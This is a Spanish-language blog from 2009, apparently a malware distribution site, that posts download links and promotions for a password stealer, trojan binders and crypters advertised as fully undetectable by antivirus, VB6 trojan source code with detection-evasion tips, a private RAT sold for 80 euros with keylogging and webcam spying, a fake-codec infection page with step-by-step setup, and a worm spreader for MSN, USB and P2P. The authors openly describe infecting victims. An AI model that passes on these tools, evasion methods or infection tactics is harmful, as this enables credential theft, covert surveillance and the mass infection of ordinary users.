- Mozilla Firefox
- Windows Live Messenger
-Winzip
- PhotoShop 7.0
- No-Ip
- mIrc
- Norton Antivirus

- Juegos :

- COD SAGA (se arreglaron las llaves del registro ya que estaban mal)
- Burnout Paradise
- Crysis Wars
- Counter Strike
- BattleField2
- RainbowSix
- The Gladiators

A continuacion se puede apreciar una imagen del archivo de texto que llega con las contraseñas y claves despues de infectar a la victima.

Cabe aclarar que solo envia las contraseñas guardadas, y por ahora solo acepta correos de hotmail o gmail.

ACTUALIZADO: EL STEALER NO ESTA FUNCIONANDO, NO ENVIA LAS CONTRASEÑAS PORQUE SE CERRARON LAS CUENTAS DE GMAIL Y HOTMAIL. YA LO ACTUALIZARAN.
Pueden ver otros stealers aqui.

Descarga
Royal Stealer v1.0e (rapidshare)
Royal Stealer v1.0e (megaupload)
Royal Stealer v1.0x (pagina oficial sharki.es, se actualiza)

Pasense por la web del autor, www.sharki.es

Advanced File Joiner v1.0

2009-03-05T15:21:00.004-02:00

Esta es la nueva herramienta de WHO!, Advanced File Joiner v1.0, para los que no saben, es una aplicacion que permite juntar 2 o mas archivos en uno. Generalmente se usa para juntar el server de algun troyano con una imagen, juego o cualquier otro archivo.

El AFJ consta de un completo anti debuuging, y tiene la posibilidad de cambiar el icono.

Otra de sus caracteristicas es que funciona perfectamente en Windows vista sin privilegios, a diferencia de la mayoria de los binders o joiners.

Al dia de hoy esta 100% indetectable, esperemos que dure por un tiempo mas, si no, tienen como alternativa alguna version privada del Elite protector 1 o Elite protector 2, que es mucho mas completo y con garantia de indetectabilidad.

File Info

Report generated: 5.3.2009 at 0.41.15 (GMT 1)
Filename: myStub.exe
File size: 99 KB
MD5 Hash: 83C1B4F28A16A51425D2D134BD5C301A
SHA1 Hash: 9394EB599453048E387A2DB42C0CC7629454B82F
Packer detected: Borland Delphi 6.0 - 7.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org

Descarga
Advanced File Joiner v1.0 (rapidshare)
Advanced File Joiner v1.0 (megaupload)

Pagina oficial: http://tr0jan.net

Pack de bromas

2009-02-28T15:00:00.005-02:00

Para los que le aburrieron las revistas de HXC les traigo este pack de bromas realizado por emodrigo, que puede usarse para ejecutar remotamente con nuestros RAT o simplemente para enviarla a quien sea.

Ninguna broma causa daños en la pc, y se pueden finalizar facilmente desde el administrador de tareas, pero algunas son realmente molestas y sera nesesario reiniciar la pc.

Estas bromas tambien pueden usarse para infectar, se las infecta con algun server y luego se las pasa a los contactos de msn, se rien un rato y estos contactos se la pasan a sus otros contactos (Como un "spread msn" manual, si que funciona).

Recomiendo testearla en maquinas virtuales.

Pack de bromas (rapidshare)
Pack de bromas (megaupload)

Los cuadernos de Hack X Crack

2009-02-20T00:40:00.013-02:00

Hoy les dejo la coleccion completa de las revistas Hack X crack, una de las mejores revistas de hacking en español (para mi la mejor). La revista es del 2002, algo antigua, pero igualmente todo lo que contiene funciona perfectamente.

Se las recomiendo para todos los que no la leyeron. Los textos son muy completos y estan muy bien explicados, mejor de lo que pueden encontrar en otros sitios. Contiene muchas practicas que se pueden realizar en sistemas windows y linux, tambien enseña a programar desde 0 en varios lenguajes.

Desafortunadamente esta revista se dejo de publicar por motivos economicos, y la comunidad de HXC que en su epoca era una de las mas grandes del estilo desaparecio casi por completo.

La coleccion completa consta de 30 cuadernos, esta es la version en pdf original, no la escaneada. Algunas las saque de elhacker.net, y otras las subi yo, porque ya no se encontraban. Agrego ademas los titulos prinsipales de cada revista y algunos mirror en megaupload.

Cuaderno 1

-Crea tu primer troyano indetectable por los antivirus
-FXP:sin limite de velocidad, utilizando conexiones ajenas
-Los secretos del FTP
-Esquivando firewalls
-Pass mode versus port mode

Descarga: Cuadernos HackxCrack Numero 1 - [mirror]

Cuaderno 2

-Code/decode bug (como hackear servidores paso a paso)
-Ocultacion de ip: primeros pasos
-Aznar al frente de la gestapo digital

Descarga: Cuadernos HackxCrack Numero 2 - [mirror]

Cuaderno 3

-Ocultando nuestra ip, encadenando proxys
-proxy: ocultando todos nuestros programas tras las cadenas de proxies
-practicas de todo lo aprendido

Descarga: Cuadernos HackxCrack Numero 3 - [mirror]

Cuaderno 4

-Crea tu segundo troyano indetectable e inmune a los antivirus
-Radmin: remote administrator 2.1, un controlador remoto a medida

Descarga: Cuadernos HackxCrack Numero 4 - [mirror]

Cuaderno 5

-Aprende a compilar, paso obligado antes de explicarte los exploits
-Rootkits, sin defensa posible
-penetracion de sistemas por netbios
-compilacion del netcat con opciones “especiales”
-netbios: un agujero de seguridad no reconocido por microsoft
-La censurado en internet

Descarga: Cuadernos HackxCrack Numero 5 - [mirror]

Cuaderno 6

-Curso de visual basic: aprende a programar desde 0
-Ficheros Stream (invisibles, peligrosos y ejecutables)
-Rippeando videos Divx, El rey
-Ocultacion avanzada de ficheros en windows xp
-Listado de puertos y Servicios: imprescindible!!!
-IPHXC: El tercer troyano de hack x crack (parte 1)
-Trasteando con el hardware de una lan

Descarga: Cuadernos HackxCrack Numero 6 - [mirror]

Cuaderno 7

-Apache, El mejor servidor web- transforma tu pc en un servidor web
-El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones
-IPHXC (segunda parte) nuestro tercer troyano
-La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correo
Los primeros pasos con IRIS (sniffando la red)
-Accede por Telnet a servidores POP3, entendiendo los protocolos
-Curso de visual basic, segunda entrega
-Rippeando (2ª parte) el audio: AC3 — MP3 –OGG
-Consigue una cuenta POP3 gratis

Descarga: Cuadernos HackxCrack Numero 7 - [mirror]

Cuaderno 8

-Linux: Netcat Perl “pipes”
-Reverse shell, burlando al firewall
-Encadenando programas
-Penetracion inversa en PCs remotos
-SMTP: descubre los protocolos de internet
-Apache: Configuracion, comparte ficheros desde tu propio servidor web
-Jugando de nuevo con el NETCAT
-SERIE RAW: protocolos
-Visual Basic: “Arrray de controles” “vectores” “ocx”

Descarga: Cuadernos HackxCrack Numero 8 - [mirror]

Cuaderno 9

-NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso
-Iniciacion al PORT SCANNING - Tecnicas de “scaneo”
-Serie RAW: IRC - Internet Relay Chat
-Chateando mediante Telnet
-GNU Linux- Permisos de archivo CAT y otros comandos
-APACHE- Modulos y servidores virtuales
-Descubre los protocolos de “la red” con nosotros
-VISUAL BASIC - Creando librerias. Acceso a datos

Descarga: Cuadernos HackxCrack Numero 9 - [mirror]

Cuaderno 10

-GNU LINUX- Gestion de usuarios, editores de texto: “VI”
-Serie Raw: Conociendo protocolos y su seguridad
-Curso de Visual Basic (V) acceso a datos II,
-XML: el futuro de la transferencia de datos
-Apache parte IV, trio de ases: APACHE- PHP- MYSQL

Descarga: Cuadernos HackxCrack Numero 10 - [mirror]

Cuaderno 11

-Programacion en GNU Linux: Bash Scripting y C
-Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol)
-Intrusión en redes de área local, la pesadilla de todo administrador
-Apache parte V: Configura tu servidor apache como servidor proxy
-Validacion de documentos XML: DTD primera parte: creacion de DTDS
-Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser
-Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa

Descarga: Cuadernos HackxCrack Numero 11 - [mirror]

Cuaderno 12

-Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!!
-Raw 6: FTP segunda parte
-Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos - autentificacion - analizando a nuestros visitantes - logs codificación - HTPASSWD - Cortafuegos
-Visual Studio.net: crea tu propia herramienta de cracking
-Validacion de documentos XML: DTD segunda parte, atributos y elementos
-IIS bug exploit, nuestro primer scanner
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C

Descarga: Cuadernos HackxCrack Numero 12 - [mirror]

Cuaderno 13

-Manipulación de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument
-Programación en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C
-Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I)
-RAW 7: HTTP (Hypertext Transfer Protocol)
-Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos

Descarga: Cuadernos HackxCrack Numero 13 - [mirror]

Cuaderno 14

-Curso de PHP, empezamos a programar, PHP (1)
-Serie RAW (Cool DNS - Domain Name System
-Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II)
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (III)
-Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I)
-Tecnicas de Hijacking

Descarga: Cuadernos HackxCrack Numero 14 - [mirror]

Cuaderno 15

-Curso de PHP (II) Aprende a programar tu propio generador de IPs
-Serie XBOX Life, instalando Linux en una Xbox
-RAW 9: MSN (Microsoft Messenger)
-Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III)
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (IV)

Descarga: Cuadernos HackxCrack Numero 15 - [mirror]

Cuaderno 16

-Curso PHP: Aprende a manejar ficheros con PHP
-Programación en GNU Linux, programación del sistema: El sistema I.P.C.
-Manipulación de documentos XML: El DOM tercera parte
-Serie XBOX LIFE: EVOLUTION X tu mejor amigo
-RAW 10 - NNTP (Usenet)

Descarga: Cuadernos HackxCrack Numero 16 - [mirror]

Cuaderno 17

-Hackeando un servidor Windows en 40 segundos!!!
-Programación en GNU Linux: programación del sistema, el sistema I.P.C (II)
-Curso de TCP/IP, introducción
-Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP
-Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos

Descarga: Cuadernos HackxCrack Numero 17 - [mirror]

Cuaderno 18

-Curso de PHP, manejo de formularios web
-Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia
-Programación en GNU Linux, memoria compartida
-Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario)
-El lenguaje XSL, transformacion del documento XML
-La realidad de los virus informáticos

Descarga: Cuadernos HackxCrack Numero 18 - [mirror]

Cuaderno 19

-Programación en Gnu Linux, colas de mensajes
-XBOX LIFE V - Jugando online gratis
-Crackeando las restricciones de seguridad de windows
-Curso de seguridad en redes - IDS
-Curso de PHP - Aprende a manejar sockets con PHP

Descarga: Cuadernos HackxCrack Numero 19 - [mirror]

Cuaderno 20

-Curso de PHP: Aprende a manejar sesiones
-Curso de TCP/IP (3ª entrega) TCP, 1ª parte
-XBOX LIFE VI, Menu X
-Curso de seguridad en redes - IDS (II)

Descarga: Cuadernos HackxCrack Numero 20 - [mirror]

Cuaderno 21

-Trabajando con bases de datos en PHP
-Curso de TCP/IP: 4ª entrega: TCP 2ª parte
-IDS, Sistema de Detección de Intrusos, tercera entrega, pluggins de salida en SNORT
-XBOX LIFE VII, Creando nuestro Slayer

Descarga: Cuadernos HackxCrack Numero 21 - [mirror]

Cuaderno 22

-Asaltando foros: guia paso a paso
-Firewalls: Qué son, cómo funcionan y cómo saltárselos

Descarga: Cuadernos HackxCrack Numero 22 - [mirror]

Cuaderno 23

-Cómo explotar fallos Buffer Overflow
-Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet)
-Diseño de cortafuegos (parte II)

Descarga: Cuadernos HackxCrack Numero 23 - [mirror]

Cuaderno 24

-Los bugs y los exploits, esos pequeños bichos y diablos
-Curso de TCP/IP: La capa IP primera parte. Las direcciones IP
-Hacking de Linux
-Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls)

Descarga: Cuadernos HackxCrack Numero 24 - [mirror]

Cuaderno 25

-Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte
-Vulnerabilidades Web, atacando la sesión de usuario
-Curso de TCP IP: La capa IP, segunda parte, (los datagramas)

Descarga: Cuadernos HackxCrack Numero 25 - [mirror]

Cuaderno 26

-Sombras en internet: sniffando la red - formas de detección - utilidades para la detección -ethereal: descripción. Capturando tráfico. Estableciendo filtros. Capturando información sensible. Telnet vs Secure shell
-Atacando la caché DNS
-Curso de TCP IP: La capa IP 3ª parte: fragmentación de datagramas

Descarga: Cuadernos HackxCrack Numero 26 - [mirror]

Cuaderno 27

-Taller de Python “episodio 1?
-Taller de Criptografía - El sistema PGP
-Curso de TCP IP: protección con iptables, en una red corporativa
-Buffer Overflow
-Hackeando el núcleo

Descarga: Cuadernos HackxCrack Numero 27 - [mirror]

Cuaderno 28

-Hacking Estragegia, capitulo 1
-Curso de Python, capitulo 2
-Investigación, poniendo a prueba el antivirus
-Explotando Heap/BSS Overflows, capitulo 2
-Programación, curso de C, capitulo 1
-Taller de criptografía, capitulo 2
-La “ley de la mordaza”: informar es DELITO

Descarga: Cuadernos HackxCrack Numero 28 - [mirror]

Cuaderno 29

-Hacking estrategia: infiltración en una red wireless protegida
-Capitulo III: Taller de criptografía
-Control de Logs en GNU/LINUX
-Explotación de las Format Strings, capitulo III
-Shatter Attacks
-Curso de C, capitulo II
-FAQ, curiosidades de Gmail/Google

Descarga: Cuadernos HackxCrack Numero 29 - [mirror]

Cuaderno 30

-Taller de criptografía, capitulo IV
-Ataques a formularios web
-Los secretos del protocolo SOCKS
-Creamos una Shellcode paso a paso
-Capitulo III: Curso de C: Punteros y Arrays
-Hack mundial

Descarga: Cuadernos HackxCrack Numero 30 - [mirror]

Y para los que prefieren bajarla mas comodamente:
Cuadernos HackxCrack Numero 1-19
Cuadernos HackxCrack Numero 21-24
Cuadernos HackxCrack Numero 25-28
Cuadernos HackxCrack Numero 29-30

Leanlas, se las recomiendo, sobre todo para los usuarios de nivel bajo y medio, los de nivel avanzado supongo que ya se las leyeron jaja. Si falta alguna me dicen asi la resubo o coloco algun mirror.

Billar Crypter c2.0

2009-02-11T21:29:00.005-02:00

Ya esta disponible para la descarga la nueva version del Billar crypter programado por 4n0nym0us.
Creado especialmente para los visitantes de troyanosyvirus e indetectables. Al dia de hoy es 100% indetectable y soporta EOF data para usar con bifrost. Tambien incluye un cambiador de iconos simple.

Descarga
Billar Crypter c2.0 (rapidshare)
Billar Crypter c2.0 (megaupload)
Pass: troyanosyvirus.com.ar

VB6 - Troyano Breaksoft incompleto

2009-02-06T16:44:00.001-02:00

Hoy les traigo el codigo fuente del troyano Breaksoft supuestamente programado por Skyweb07 en Visual Basic 6.
El troyano no esta completamente terminado, pero si esta funcionando, conecta perfectamente y en windows xp es muy estable.
Esta en español y el codigo es muy facil de entender, a diferencia de lo que es el Biodox v1.0 open source de who. Ideal para los que neseciten una base para crear su propio troyano o RAT en VB6.

Se le pueden hacer muchas modificaciones, sobre todo al servidor, prinsipalmente se podria agregar el autoinicio para windows vista y cuentas limitadas. Y despues reemplazar en el servidor winsock por csocketmaster para que funcione en cualquier pc.

El troyano es detectado, pero se puede dejarlo indetectable cambiando el nombre de algunas variables vitales del servidor, tambien se puede cambiar el nombre de winsock WS por otro, eso generalmente funciona. Y por ultimo cambiar el nombre del proyecto, aplicacion, etc. No deberia haber problema con eso durante algun tiempo.

Descarga
Demo Breaksoft - codigo fuente (rapidshare)
Demo Breaksoft - codigo fuente (megaupload)

Eye Crypter little edittion

2009-01-30T15:24:00.004-02:00

Esta es una nueva version publica del Eye crypter creado por Fakundo, al dia de hoy 100% indetectable, sus caracteristicas prinsipales son:

-EOF data support (para utilizar con bifrost, spy net, etc)
-Bypass KAV 2009
-Bypass Avira antivir

File: Stub.exe
SHA-1 Digest: b76f70e861ec0751cc886f715cd3f7b557655eb2
Size: 16384 bytes
Detected Packer: Microsoft Visual Basic v5.0/v6.0
Status: Potentially Clean (Confidence 100.00%)
Date Scanned: Fri Jan 30 12:13:34 +0000 2009

Scan: http://scanner.virus.org/scan/QMxUX6Qjx/b76f70e861ec0751cc886f715cd3f7b557655eb2

Descarga
Eye Crypter little edittion (rapidshare)
Eye Crypter little edittion (megaupload)

Ya esta disponible El eye crypter 3 privado con garantia de 3 REFUDS por 80 Euros, para compras contactar a ventas.tyv@gmail.com

Codecs fake web en html

2009-01-23T23:58:00.006-02:00

Esto basicamente es un simple html que contiene un video, y para ver dicho video requiere descargarse un codec, se usa para infectar con cualquier malware.

Funciona de la siguiente manera
1-El usuario ingresa en la web fake para ver un video..
2-Para ver el video se requiere la descarga de un archivo entonces el usuario puede o no proceder a descargar el "codec", si no lo descarga no pasara nada, ni podra ver el video.
3-Si el usuario instala ese "codec" quedara infectado y podra ver el video sin problemas para que no haya sospechas.

Es un metodo utilizado por los "spammers" para infectar de forma masiva, y no es nada novedoso pero nunca esta de mas postearlo.

El archivo fake.html se puede subir a cualquier host, se le puede cambiar el nombre o modificarlo completo a gusto de cada uno. Las imagenes se encuentran en la carpeta commons, y ya estan alojadas en imageshack.us asi que no es nesesario subirlas.

Se debe modificar las URL siguiente con el bloc de notas u otro editor:

http://servidor.com/archivo.exe

Y opcionales:

http://server/mov1.html
http://server/mov1.wmv

Recomendacion?
No descarguen codecs de webs que no sean conocidas y menos si su extension es .exe jaja...

Descarga
Codecs fake web en html
Codecs fake web en html

Troyano MFucker PRIVADO

2009-01-19T23:28:00.011-02:00

Mfucker es un nuevo troyano privado programado por el español IbArrA*.

El MFucker incluye todas las caracteristicas tipicas de cualquier otro troyano. Es estable, rapido y funciona perfectamente en Windows Vista.
Y obiamente incluye caracteristicas unicas, de las cuales se puede destacar las siguientes: Cuentas de Usuario, Adaptadores de Red, Puertos activos, Admin. de Dispositivos, Portapapeles, Contraseñas(MSN Messenger, No-IP DUC, Steam, CD Keys, Firefox, Internet Explorer), Creador de Scripts, Black Chat y varios mas (diversion, etc).
Y esta demas aclarar que es 100% indetectable a los antivirus por ser un troyano privado.

Caracteristicas oficiales:

[+] Información
- Información del PC
- Cuentas de Usuario
- Aplicaciones Instaladas
- Adaptadores de Red
- Puertos activos

[+] Manager
- Explorador de Archivos
- Procesos Activos
- Editor del Registro
- Admin. de Dispositivos
- Admin. de Servicios
- Portapapeles

[+] Contraseñas
- MSN Messenger
- No-IP DUC
- Steam
- CD Keys
- Firefox
- Internet Explorer

[+] Vigilancia
- Captura de Pantalla - Pantalla Completa
- Webcam
- KeyLogger

[+] Miscelaneo
- Creador de Scripts
- Apagado del PC
- Consola Remota
- Black Chat - Chat victima

[+] Otros
- Diversion
- Skins modificables
- Configuracion con Config.ini
- Lista de Cd-Keys modificables

En fin, el mejor troyano hasta el momento.

Sistemas de licencia
El troyano posee un nuevo sistema de licencias para evitar que personas no autorizadas a usarlo lo puedan usar. Esto tambien evita que se haga publico.

Garantia de indetectabilidad
Mfucker posee una garantia de indetectabilidad de 6 meses por parte del programador, esto quiere decir que si en algun momento te lo detectan los antivirus a tu server, el programador te envia uno nuevo en cuanto pueda.

Compras
MFucker tiene un precio de 80 Euros, Si estas interesado en comprarlo, envia un mail a ventas.tyv@gmail.com y te respondere a la brevedad.

PUM Multi spread creator V1.0

2009-01-18T21:43:00.008-02:00

PUM Multi spread creator V1.0 es un nuevo programa creado por WHO que basicamente sirve para esparcir tu server por MSN, P2P y USB. Los medios mas comunes de propagacion.

El spread MSN es el tipico worm que envia un mensaje a todos los contactos y seguidamente envia el archivo infectado, no se recomienda activar esta opcion porque llama mucho la atencion y generalmente se terminan enviando las muestras a los labs antivirus. Ademas de que las victimas pasan todos los antivirus que encuentran hasta que se logran desinfectar.
Si lo activan pongan un delay bastante largo. Y carguen una lista de mensajes creible (porque en turco dudo que lo ejecuten jaja).

Con el spread USB se copia a todos los discos extraibles, por ejemplo pendrives, mp3, mp4, algunas memorias de camaras digitales, etc.
Agrega un autorun para que cuando se inserte el dispositivo en otro equipo este se infecte.

Y con P2P, simplemente se copia a todas las carpetas para compartir (o de descargas) de los programas P2P seleccionados con todos los nombres de la lista cargada o por defecto.
Por ejemplo si tiene el ares se copiara con todos los nombres de la lista cargada en la carpeta "My Shared folder", para que se lo descarguen.

Una muy buena herramienta para testear, no para infectar, despues es imposible parar la infeccion y puede traer serios problemas. Solo la posteo para el testeo de la misma.

Descarga
PUM Multi spread creator V1.0 (rapidshare)
PUM Multi spread creator V1.0 (megaupload)

Contraseña: troyanosyvirus.com.ar